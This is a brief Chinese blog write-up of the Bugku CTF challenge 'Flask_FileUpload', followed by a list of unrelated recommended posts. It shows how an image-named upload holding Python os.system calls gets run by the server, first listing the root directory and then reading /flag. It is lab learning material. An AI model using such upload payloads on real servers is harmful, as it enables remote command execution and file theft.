Bugku-web-Flask_FileUpload

黑白时光les2024-08-01 11:52

Bugku-web-Flask_FileUpload

查看源代码,提示用python返回结果

在file.jpg中写python代码

复制代码 
import os
os.system('ls / ')

上传后查看源代码,找到flag文件夹

修改代码

复制代码 
import os
os.system('cat /flag ')
相关推荐
汪汪队长35 分钟前
谷歌浏览器自定义油猴插件
前端
ZFSS37 分钟前
SeeDance Tasks API 的对接和使用
前端·人工智能
睿智的仓鼠38 分钟前
🦞OpenClaw 快速部署及使用指南
前端·人工智能
前端付豪39 分钟前
Nest 项目小实践之图书增删改查
前端·node.js·nestjs
比特鹰39 分钟前
手把手带你用Flutter手搓人生K线
前端·javascript·flutter
zone773939 分钟前
004:RAG 入门-LangChain读取PDF
后端·python·面试
奔跑路上的Me44 分钟前
前端导出 Word/Excel/PDF 文件
前端·javascript
bluceli44 分钟前
JavaScript异步编程深度解析:从回调到Async Await的演进之路
前端·javascript
zone773944 分钟前
005:RAG 入门-LangChain读取表格数据
后端·python·agent
青青家的小灰灰1 小时前
Vue 3 新标准:<script setup> 核心特性、宏命令与避坑指南
前端·vue.js·面试
热门推荐
01GitHub 镜像站点02OpenClaw 使用和管理 MCP 完全指南03OpenClaw + 飞书(Feishu)环境搭建指南04OpenClaw优化飞书API 额度已耗尽问题05本地部署 OpenClaw + DeepSeek-R1 完全指南06Window 10部署openclaw报错node.exe : npm error code 12807Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services08小黑课堂计算机二级WPSoffice题库软件下载安装教程(2026年3月最新版)09OpenClaw大龙虾机器人完整安装教程10让 Trae IDE 智能体 “读懂”文档 Excel+PDF+DOCX :mcp-documents-reader 工具使用指南